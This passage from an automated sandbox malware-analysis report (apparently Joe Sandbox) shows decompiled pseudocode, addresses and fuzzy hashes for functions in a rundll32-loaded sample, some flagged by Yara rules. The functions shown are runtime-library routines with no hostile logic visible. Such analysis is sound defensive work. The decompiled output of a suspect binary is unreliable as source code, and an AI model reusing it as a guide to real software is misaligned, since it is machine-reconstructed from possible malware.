				if ( *_t83 != dil) goto 0x535e73be;
				_t49 =  &_a32;
				_a24 = 0;
				_v56 = _t49;
				r8d = 0;
				_a32 = 0;
				E00007FFA7FFA535E7130(0x53754cf0, 0x53754cf0, 0, 0, 0x53754cf0, _t87, __r8,  &_a24);
				r8d = 1;
				E00007FFA7FFA535E72EC(_a24, _a32, __r8);
				_t58 = _t49;
				if (_t49 != 0) goto 0x535e740f;
				E00007FFA7FFA535E8380(_t49);
				_t10 = _t58 + 0xc; // 0xc
				_t81 = _t10;
				 *_t49 = _t81;
				goto 0x535e74ae;
				_v56 =  &_a32;
				E00007FFA7FFA535E7130(_t58, 0x53754cf0, _t58, _t81, 0x53754cf0, _t87, _t49 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x535e7445;
				_t52 = _a24 - 1;
				 *0x53755720 = _t58;
				 *0x5375571c = _t52;
				goto 0x535e7408;
				_a16 = _t81;
				0x535ee390();
				if (_t52 == 0) goto 0x535e7474;
				E00007FFA7FFA535E7E58(_t52, _a16);
				_a16 = _t81;
				E00007FFA7FFA535E7E58(_t52, _t58);
				_t82 = _t52;
				goto 0x535e74b3;
				_t78 = _a16;
				if ( *_t78 == _t82) goto 0x535e748f;
				if ( *((intOrPtr*)(_t78 + 8)) != _t82) goto 0x535e7483;
				 *0x5375571c = _t82 + 1;
				_a16 = _t82;
				 *0x53755720 = _t78;
				E00007FFA7FFA535E7E58(_t78 + 8, 0);
				_a16 = _t82;
				return E00007FFA7FFA535E7E58(_t78 + 8, _t58);
			}


















                0x7ffa535e7350
                0x7ffa535e7350
                0x7ffa535e7363
                0x7ffa535e7363
                0x7ffa535e7366
                0x7ffa535e736c
                0x7ffa535e736e
                0x7ffa535e737c
                0x7ffa535e737d
                0x7ffa535e737f
                0x7ffa535e7384
                0x7ffa535e7390
                0x7ffa535e739b
                0x7ffa535e73a1
                0x7ffa535e73aa
                0x7ffa535e73b4
                0x7ffa535e73b9
                0x7ffa535e73be
                0x7ffa535e73c2
                0x7ffa535e73ca
                0x7ffa535e73cf
                0x7ffa535e73d2
                0x7ffa535e73db
                0x7ffa535e73e4
                0x7ffa535e73f1
                0x7ffa535e73f6
                0x7ffa535e73fc
                0x7ffa535e73fe
                0x7ffa535e7403
                0x7ffa535e7403
                0x7ffa535e7406
                0x7ffa535e740a
                0x7ffa535e7421
                0x7ffa535e7426
                0x7ffa535e742f
                0x7ffa535e7434
                0x7ffa535e7436
                0x7ffa535e743d
                0x7ffa535e7443
                0x7ffa535e7449
                0x7ffa535e7450
                0x7ffa535e7459
                0x7ffa535e745f
                0x7ffa535e7467
                0x7ffa535e746b
                0x7ffa535e7470
                0x7ffa535e7472
                0x7ffa535e7474
                0x7ffa535e7481
                0x7ffa535e748d
                0x7ffa535e748f
                0x7ffa535e7497
                0x7ffa535e749b
                0x7ffa535e74a2
                0x7ffa535e74aa
                0x7ffa535e74c5

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileModuleName_invalid_parameter_noinfo
                • String ID: C:\Windows\SYSTEM32\rundll32.exe
                • API String ID: 3307058713-2484965969
                • Opcode ID: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction ID: 7db2ba504eb390c77247faff789e8d262208319ca8554e8c7cd5565de7da5005
                • Opcode Fuzzy Hash: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction Fuzzy Hash: FD41A132A28F528AEB15DF31A4400BC6BAAEF86BD0B4C9075ED4EA7745DF3DE4419340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060B210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                Download Yara Rule
                C-Code - Quality: 52%
                			E000002152152060B210(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t27;
				intOrPtr _t36;
				intOrPtr* _t63;
				long long _t69;
				void* _t71;
				long long _t85;
				signed int _t86;
				intOrPtr* _t87;
				void* _t90;

				_t71 = __rcx;
				_a8 = __rbx;
				_t2 = _t71 - 1; // -1
				r14d = __ecx;
				if (_t2 - 1 <= 0) goto 0x2060b244;
				_t27 = E0000021521520603944(__rax);
				 *__rax = 0x16;
				E00000215215205FAABC(_t27);
				goto 0x2060b373;
				E0000021521520610B00();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t87 =  *0x20683078; // 0x2151e483370
				 *0x20683088 = 0x20682810;
				if (_t87 == 0) goto 0x2060b27b;
				if ( *_t87 != dil) goto 0x2060b27e;
				_t63 =  &_a32;
				_a24 = _t86;
				_v56 = _t63;
				r8d = 0;
				_a32 = _t86;
				E000002152152060AFF0(0x20682810, 0x20682810, 0x20682810, _t86, 0x20682810, _t90, __r8,  &_a24);
				r8d = 1;
				E000002152152060B1AC(_a24, _a32, __r8);
				_t69 = _t63;
				if (_t63 != 0) goto 0x2060b2cf;
				E0000021521520603944(_t63);
				_t10 = _t69 + 0xc; // 0xc
				 *_t63 = _t10;
				goto 0x2060b36e;
				_v56 =  &_a32;
				E000002152152060AFF0(_t69, 0x20682810, _t69, _t86, 0x20682810, _t90, _t63 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x2060b305;
				_t36 = _a24 - 1;
				 *0x20683068 = _t69;
				 *0x20683060 = _t36;
				goto 0x2060b2c8;
				_a16 = _t86;
				0x206148f4();
				if (_t36 == 0) goto 0x2060b334;
				E000002152152060A780( &_a32, _a16);
				_a16 = _t86;
				E000002152152060A780( &_a32, _t69);
				goto 0x2060b373;
				_t85 = _a16;
				if ( *_t85 == _t86) goto 0x2060b34f;
				if ( *((intOrPtr*)(_t85 + 8)) != _t86) goto 0x2060b343;
				 *0x20683060 = 0;
				_a16 = _t86;
				 *0x20683068 = _t85;
				E000002152152060A780(_t85 + 8, _t86 + 1);
				_a16 = _t86;
				E000002152152060A780(_t85 + 8, _t69);
				return _t36;
			}
















                0x2152060b210
                0x2152060b210
                0x2152060b223
                0x2152060b226
                0x2152060b22c
                0x2152060b22e
                0x2152060b238
                0x2152060b23a
                0x2152060b23f
                0x2152060b244
                0x2152060b250
                0x2152060b25b
                0x2152060b261
                0x2152060b26a
                0x2152060b274
                0x2152060b279
                0x2152060b27e
                0x2152060b282
                0x2152060b28a
                0x2152060b28f
                0x2152060b292
                0x2152060b29b
                0x2152060b2a4
                0x2152060b2b1
                0x2152060b2b6
                0x2152060b2bc
                0x2152060b2be
                0x2152060b2c3
                0x2152060b2c6
                0x2152060b2ca
                0x2152060b2e1
                0x2152060b2e6
                0x2152060b2ef
                0x2152060b2f4
                0x2152060b2f6
                0x2152060b2fd
                0x2152060b303
                0x2152060b309
                0x2152060b310
                0x2152060b319
                0x2152060b31f
                0x2152060b327
                0x2152060b32b
                0x2152060b332
                0x2152060b334
                0x2152060b341
                0x2152060b34d
                0x2152060b34f
                0x2152060b357
                0x2152060b35b
                0x2152060b362
                0x2152060b36a
                0x2152060b36e
                0x2152060b385

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FileModuleName_invalid_parameter_noinfo
                • String ID: C:\Windows\SYSTEM32\rundll32.exe
                • API String ID: 3307058713-2484965969
                • Opcode ID: a13a5f74116d454d1eb76d9533dac3d223ecefdb96e38d6ae60cc9efe777d0a2
                • Instruction ID: 3c15e4d979a7db09759cd7d2aceda58df9852c685e8dbb8529379fb9db5df11f
                • Opcode Fuzzy Hash: a13a5f74116d454d1eb76d9533dac3d223ecefdb96e38d6ae60cc9efe777d0a2
                • Instruction Fuzzy Hash: F241BD37282E71C5EB249F2598442EE63A6FFA4BC0F348065EE4943B4DEE35E485C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520613814 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E0000021521520613814() {
				intOrPtr _t35;
				void* _t36;
				void* _t37;
				void* _t41;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t59;

				_t47 = _t51;
				_t50 = _t47 - 0x5f;
				_t52 = _t51 - 0x90;
				asm("movaps [eax-0x18], xmm6");
				asm("movaps xmm6, xmm2");
				if (r9d == 1) goto 0x2061394c;
				_t41 = r9d - 2;
				if (_t41 == 0) goto 0x20613919;
				if (_t41 <= 0) goto 0x2061398b;
				if (r9d - 5 <= 0) goto 0x2061390a;
				if (r9d == 6) goto 0x206138dc;
				if (r9d == 7) goto 0x206138a3;
				if (r9d != 9) goto 0x2061398b;
				 *(_t50 + 0x17) =  *(_t50 + 0x17) & 0x00000000;
				_t4 = _t47 + 1; // 0x3
				r9d = _t4;
				 *((intOrPtr*)(_t52 + 0x40)) = 2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) = 0x22;
				asm("movss [ebp+0x17], xmm6");
				 *((intOrPtr*)(_t52 + 0x20)) = 0x11;
				goto 0x2061397a;
				 *(_t50 + 0x1f) =  *(_t50 + 0x1f) & 0x00000000;
				r9d = 4;
				 *((intOrPtr*)(_t52 + 0x40)) = 2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) = 0x22;
				asm("movss [ebp+0x1f], xmm6");
				 *((intOrPtr*)(_t52 + 0x20)) = 0x12;
				goto 0x2061397a;
				 *(_t50 + 0x27) =  *(_t50 + 0x27) & 0x00000000;
				r9d = 1;
				 *((intOrPtr*)(_t52 + 0x40)) = 2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				asm("movss [ebp+0x27], xmm6");
				 *(_t52 + 0x28) = 0x21;
				goto 0x20613972;
				asm("movss [ebp+0x7f], xmm6");
				_t35 = E0000021521520617FBC(2,  *((intOrPtr*)(_t50 + 0x7f)));
				goto 0x2061398e;
				 *(_t50 + 0x2f) =  *(_t50 + 0x2f) & 0x00000000;
				r9d = _t35;
				 *((intOrPtr*)(_t52 + 0x40)) = _t35;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) = 0x22;
				asm("movss [ebp+0x2f], xmm6");
				 *((intOrPtr*)(_t52 + 0x20)) = 4;
				goto 0x2061397a;
				 *(_t50 + 0x37) =  *(_t50 + 0x37) & 0x00000000;
				 *((intOrPtr*)(_t52 + 0x40)) = _t35;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) =  *(_t52 + 0x28) & 0x00000000;
				asm("movss [ebp+0x37], xmm6");
				r9d = 0;
				 *((intOrPtr*)(_t52 + 0x20)) = 8;
				_t36 = E0000021521520617E6C(_t37, 0x1d, r9d, 0x20637230, _t49,  *(_t50 + 0x37), _t59);
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x80]");
				return _t36;
			}













                0x21520613814
                0x21520613818
                0x2152061381c
                0x21520613823
                0x21520613827
                0x21520613833
                0x21520613839
                0x2152061383c
                0x21520613842
                0x2152061384c
                0x21520613856
                0x21520613860
                0x21520613866
                0x2152061386c
                0x21520613871
                0x21520613871
                0x21520613875
                0x21520613879
                0x2152061387f
                0x21520613885
                0x2152061388d
                0x21520613896
                0x2152061389e
                0x215206138a3
                0x215206138a8
                0x215206138ae
                0x215206138b2
                0x215206138b8
                0x215206138be
                0x215206138c6
                0x215206138cf
                0x215206138d7
                0x215206138dc
                0x215206138e1
                0x215206138e7
                0x215206138eb
                0x215206138f1
                0x215206138f7
                0x21520613900
                0x21520613908
                0x2152061390a
                0x21520613912
                0x21520613917
                0x21520613919
                0x2152061391e
                0x21520613921
                0x21520613925
                0x2152061392b
                0x21520613931
                0x21520613939
                0x21520613942
                0x2152061394a
                0x2152061394c
                0x21520613951
                0x21520613955
                0x2152061395b
                0x21520613961
                0x21520613966
                0x2152061396b
                0x21520613972
                0x21520613986
                0x2152061398b
                0x2152061398e
                0x2152061399e

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _handle_errorf
                • String ID: "$powf
                • API String ID: 2315412904-603753351
                • Opcode ID: 6c2342f624db5eedf88f38fb13525dd90f439cd257be43dc1c3e5d194d4eb011
                • Instruction ID: b2cfad94374e8d4286fce903c7e1c64bfdd4dca739b949b3107311d2bd551600
                • Opcode Fuzzy Hash: 6c2342f624db5eedf88f38fb13525dd90f439cd257be43dc1c3e5d194d4eb011
                • Instruction Fuzzy Hash: 87414673925A90DEE770CF22E4847EAF6A0F7E9348F241305FB4601A98DB79D5509F40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E848C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID: @
                • API String ID: 3000768030-2766056989
                • Opcode ID: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction ID: 618d5276e47d146b9cf9da45befc5598c52de1a1d90d6f3e986a99bd73336b0b
                • Opcode Fuzzy Hash: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction Fuzzy Hash: CB218862A28F5249E7658B24D490139265AEFC6F74F2C6376D67F277D4CE38D481E300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060E2A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FileHandleType
                • String ID: @
                • API String ID: 3000768030-2766056989
                • Opcode ID: 3a30d98f43607e73f85b996430d654d6548bd93877278401218b6b0afaff891f
                • Instruction ID: 33c8a4b849ba9fbdd1d592c266a5759db81784c018124ccd4cf63018fb144486
                • Opcode Fuzzy Hash: 3a30d98f43607e73f85b996430d654d6548bd93877278401218b6b0afaff891f
                • Instruction Fuzzy Hash: F821B633656E71C1EB788B6494982AE2A52FBE5774F381345DEAA077DCCA34D881C301
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205B2300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00000215215205B2300(signed int __eax, void* __eflags, void* __rcx) {
				signed int _t4;

				if (__eflags == 0) goto 0x205b231f;
				_t4 = __eax | 0xffffffff;
				asm("lock xadd [ecx+0x30], eax");
				if (_t4 == 1) goto 0x20593df0;
				return _t4;
			}




                0x215205b2308
                0x215205b230e
                0x215205b2311
                0x215205b2319
                0x215205b231f

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionErrorLastPostQueuedStatus
                • String ID: pqcs
                • API String ID: 1506555858-2559862021
                • Opcode ID: bed270116d7dcb53275eac40756afc65f4fdd3868e38dd205acd798e68efb58d
                • Instruction ID: 5f095075cc9397cc21bba29f379c51993bff844370e6c115a2236c566cd60cf3
                • Opcode Fuzzy Hash: bed270116d7dcb53275eac40756afc65f4fdd3868e38dd205acd798e68efb58d
                • Instruction Fuzzy Hash: 6C21F633712E50C6EFA08B29A4D879E23A0FBE47A4F240315DE6D836E8DF35C4418B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206136F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00000215215206136F0(void* __rax, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a80) {
				void* _v40;
				intOrPtr _v56;
				intOrPtr _v80;
				intOrPtr _v88;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t22;
				void* _t25;
				void* _t28;
				void* _t32;

				_t25 = __rax;
				asm("movaps [esp+0x60], xmm6");
				asm("movaps xmm6, xmm2");
				_t20 = r9d - 2;
				if (_t20 == 0) goto 0x206137c8;
				if (_t20 <= 0) goto 0x20613807;
				if (r9d - 5 <= 0) goto 0x206137af;
				_t22 = r9d - 6;
				if (_t22 == 0) goto 0x20613787;
				if (_t22 <= 0) goto 0x20613807;
				if (r9d - 8 <= 0) goto 0x2061375f;
				if (r9d != 9) goto 0x20613807;
				_v56 = 2;
				_t2 = _t25 + 1; // 0x3
				r9d = _t2;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x11;
				goto 0x206137eb;
				_v56 = 2;
				r9d = 4;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x12;
				goto 0x206137eb;
				_v56 = 2;
				r9d = 1;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x21;
				_v88 = 8;
				goto 0x206137eb;
				asm("movsd [esp+0x50], xmm2");
				asm("movaps xmm6, [esp+0x60]");
				goto 0x20617fa0;
				_a64 = 2;
				r9d = 2;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_a40 = 0x22;
				_a32 = 4;
				asm("movsd [esp+0x50], xmm2");
				_t17 = E0000021521520617D44(_t18, 0x1d, r9d - 9, 0x20635d34, _t28, _a80, _t32);
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x60]");
				return _t17;
			}














                0x215206136f0
                0x215206136f9
                0x215206136fe
                0x21520613701
                0x21520613704
                0x2152061370a
                0x21520613714
                0x2152061371a
                0x2152061371e
                0x21520613720
                0x2152061372a
                0x21520613730
                0x21520613736
                0x2152061373a
                0x2152061373a
                0x2152061373e
                0x21520613744
                0x2152061374a
                0x21520613752
                0x2152061375a
                0x2152061375f
                0x21520613763
                0x21520613769
                0x2152061376f
                0x21520613775
                0x2152061377d
                0x21520613785
                0x21520613787
                0x2152061378b
                0x21520613791
                0x21520613797
                0x2152061379d
                0x215206137a5
                0x215206137ad
                0x215206137af
                0x215206137ba
                0x215206137c3
                0x215206137c8
                0x215206137cc
                0x215206137cf
                0x215206137d5
                0x215206137db
                0x215206137e3
                0x215206137eb
                0x21520613802
                0x21520613807
                0x2152061380a
                0x21520613813

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _handle_error
                • String ID: "$pow
                • API String ID: 1757819995-713443511
                • Opcode ID: 24a612d41a076fe53ae8f8d4ac9651821026316ae4d0cf45d5107ec8e28e6433
                • Instruction ID: 1e1e401a1d1f83cf36624081d62ff3f3a4be57ce980b4fd066188b623173fba2
                • Opcode Fuzzy Hash: 24a612d41a076fe53ae8f8d4ac9651821026316ae4d0cf45d5107ec8e28e6433
                • Instruction Fuzzy Hash: 933110B3919E94C6DB70CF10E4447AAFAA0FBEA344F241305FA8606A98D77DD1859B04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520593DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E0000021521520593DF0(long long __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8) {
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				long long _v88;
				void* _t34;
				void* _t35;
				long long _t47;
				long long _t61;
				void* _t62;

				_t50 = __rbx;
				_t47 = __rax;
				_v88 = 0xfffffffe;
				_a8 = __rbx;
				_t3 = __rcx + 0x34;
				 *_t3 = 1;
				if ( *_t3 != 0) goto 0x20593ec7;
				_t5 = __rcx + 0x38;
				 *_t5 = 1;
				if ( *_t5 != 0) goto 0x20593ec7;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0x20593ec7;
				_t34 = GetLastError();
				E000002152152058F380( *((intOrPtr*)(__rcx + 0x28)), __rdx);
				_t61 = _t47;
				_v80 = _t47;
				_v72 = _t47;
				if ( *((intOrPtr*)(_t61 + 8)) + 0xda812030 - 1 <= 0) goto 0x20593e7d;
				 *((intOrPtr*)( *_t61 + 0x30))();
				goto 0x20593e82;
				_v64 = 0xda812030;
				_v80 = _t34;
				_v72 = _t61;
				if (((0 | _t34 != 0x00000000) & 1) == 0) goto 0x20593ec7;
				if (0x4d54ee85da812032 != 1) goto 0x20593ea5;
				if (_t34 == 0) goto 0x20593ec7;
				E0000021521520590B90(_t35, __rbx,  &_v56,  &_v80, "pqcs");
				return E000002152152059DF30(_t34, _t50,  &_v56, _t62, "pqcs");
			}













                0x21520593df0
                0x21520593df0
                0x21520593df6
                0x21520593dff
                0x21520593e0e
                0x21520593e0e
                0x21520593e13
                0x21520593e19
                0x21520593e19
                0x21520593e1e
                0x21520593e24
                0x21520593e27
                0x21520593e36
                0x21520593e42
                0x21520593e44
                0x21520593e49
                0x21520593e4e
                0x21520593e53
                0x21520593e6d
                0x21520593e77
                0x21520593e7b
                0x21520593e89
                0x21520593e8e
                0x21520593e92
                0x21520593e99
                0x21520593e9f
                0x21520593ea3
                0x21520593eb6
                0x21520593ed4

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionErrorLastPostQueuedStatus
                • String ID: pqcs
                • API String ID: 1506555858-2559862021
                • Opcode ID: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction ID: c75f562e91bbd0f468f792f5b6138d724c06ca11ed6e6bab74752be2639e4d7e
                • Opcode Fuzzy Hash: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction Fuzzy Hash: 4021C233712E50CAEFA08B15A5C479E63A4FBE4794F244225DE99836A8DF34C4558B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520591000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E0000021521520591000(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
				void* _v8;
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				long _t21;
				void* _t31;
				void* _t32;
				long long _t42;
				long long _t56;
				long long _t58;

				_t45 = __rbx;
				_t42 = _t58;
				 *((long long*)(_t42 - 0x58)) = 0xfffffffe;
				 *((long long*)(_t42 + 8)) = __rbx;
				 *((long long*)(_t42 + 0x10)) = __rsi;
				_t21 = TlsAlloc();
				if (_t21 != 0xffffffff) goto 0x205910b4;
				_t31 = GetLastError();
				E000002152152058F380(__rcx, __rdx);
				_t56 = _t42;
				_v80 = _t42;
				_v72 = _t42;
				if ( *((intOrPtr*)(_t56 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059106a;
				 *((intOrPtr*)( *_t56 + 0x30))();
				goto 0x2059106f;
				_v64 = 0xda812030;
				_v80 = _t31;
				_v72 = _t56;
				if (((0 | _t31 != 0x00000000) & 1) == 0) goto 0x205910b4;
				if (0x4d54ee85da812032 != 1) goto 0x20591092;
				if (_t31 == 0) goto 0x205910b4;
				E0000021521520590B90(_t32, __rbx,  &_v56,  &_v80, "tss");
				E000002152152059DF30(_t31, _t45,  &_v56, _t56, "tss");
				return _t21;
			}














                0x21520591000
                0x21520591000
                0x21520591008
                0x21520591010
                0x21520591014
                0x21520591018
                0x21520591023
                0x2152059102f
                0x21520591031
                0x21520591036
                0x2152059103b
                0x21520591040
                0x2152059105a
                0x21520591064
                0x21520591068
                0x21520591076
                0x2152059107b
                0x2152059107f
                0x21520591086
                0x2152059108c
                0x21520591090
                0x215205910a3
                0x215205910ae
                0x215205910c7

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocErrorLast
                • String ID: tss
                • API String ID: 4252645092-1638339373
                • Opcode ID: e82f6ce6112f27b1e9590116a3777b187b98120dad7ae3bf605ab3515013e93c
                • Instruction ID: ba69e3359d2a196ff0a17540208e9de410480e2e7bd4dbe93d94f2e6d364e34f
                • Opcode Fuzzy Hash: e82f6ce6112f27b1e9590116a3777b187b98120dad7ae3bf605ab3515013e93c
                • Instruction Fuzzy Hash: 79119633712FA4C7DF509B15A48829D63A4FBD57A0F144361EEAE83798DF35C9858740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520611544 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 76%
                			E0000021521520611544(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r9, char _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t31;
				intOrPtr* _t33;
				void* _t43;
				void* _t46;

				_t44 = __rsi;
				_a16 = __rbx;
				_a24 = __rsi;
				_t43 = __rdx;
				_t33 = __rcx;
				if (__rcx == 0) goto 0x206115b6;
				if ( *__rcx == 0) goto 0x206115b6;
				if (E0000021521520616FFC( *__rcx, __rcx, 0x20635b30) == 0) goto 0x206115b6;
				if (E0000021521520616FFC(E0000021521520616FFC( *__rcx, __rcx, 0x20635b30), __rcx, 0x20635b38) != 0) goto 0x206115ac;
				_t3 = _t43 + 0x258; // 0x2f0
				_t4 = _t44 + 2; // 0x2
				r9d = _t4;
				if (E000002152152060CB80(0x2000000b, E0000021521520616FFC(E0000021521520616FFC( *__rcx, __rcx, 0x20635b30), __rcx, 0x20635b38), __rcx, _t3, __rdx, __rsi, _t46,  &_a8) == 0) goto 0x206115d6;
				goto 0x206115e8;
				E000002152152060BE10(0x2000000b, _t31, _t33, _t33, _t44, _t46);
				goto 0x206115e8;
				_t7 = _t43 + 0x258; // 0x2f0
				r9d = 2;
				if (E000002152152060CB80(0x20001004, E000002152152060CB80(0x2000000b, E0000021521520616FFC(E0000021521520616FFC( *__rcx, __rcx, 0x20635b30), __rcx, 0x20635b38), __rcx, _t3, __rdx, __rsi, _t46,  &_a8), _t33, _t7, _t43, _t44, _t46,  &_a8) != 0) goto 0x206115da;
				goto 0x206115e8;
				if (_a8 != 0) goto 0x206115e8;
				return GetACP();
			}








                0x21520611544
                0x21520611544
                0x21520611549
                0x21520611555
                0x21520611558
                0x2152061155e
                0x21520611563
                0x21520611573
                0x21520611586
                0x21520611588
                0x21520611594
                0x21520611594
                0x215206115a4
                0x215206115aa
                0x215206115af
                0x215206115b4
                0x215206115b6
                0x215206115bd
                0x215206115d4
                0x215206115d8
